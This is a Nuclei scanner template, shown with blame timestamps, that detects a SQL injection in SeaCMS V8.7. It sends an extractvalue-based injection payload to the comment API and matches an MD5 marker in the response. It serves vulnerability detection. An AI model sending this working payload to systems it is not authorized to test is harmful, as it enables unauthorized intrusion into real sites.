nuclei-templates/vulnerabilities/other/seacms-sqli.yaml

31 lines
610 B
YAML
Raw Normal View History

2022-04-05 13:12:45 +00:00
id: seacms-sqli
2022-04-05 13:12:45 +00:00
info:
2022-04-06 04:48:53 +00:00
name: SeaCMS V8.7 SQL Injection
2022-04-05 13:12:45 +00:00
author: ritikchaddha
2022-04-06 04:48:53 +00:00
severity: high
2022-04-05 13:12:45 +00:00
reference:
- https://www.uedbox.com/post/54561/
2022-04-06 04:48:53 +00:00
tags: seacms,sqli
2022-04-05 13:12:45 +00:00
2022-06-30 03:13:38 +00:00
variables:
num: "999999999"
2022-04-05 13:12:45 +00:00
requests:
- method: GET
path:
2022-06-30 03:13:38 +00:00
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`"
2022-04-06 04:48:53 +00:00
2022-04-05 13:12:45 +00:00
redirects: true
2022-04-06 04:48:53 +00:00
max-redirects: 2
2022-04-05 13:12:45 +00:00
matchers-condition: and
matchers:
2022-04-06 04:48:53 +00:00
- type: word
part: body
words:
2022-06-30 03:13:38 +00:00
- '{{md5({{num}})}}'
2022-04-06 04:48:53 +00:00
2022-04-05 13:12:45 +00:00
- type: status
status:
- 200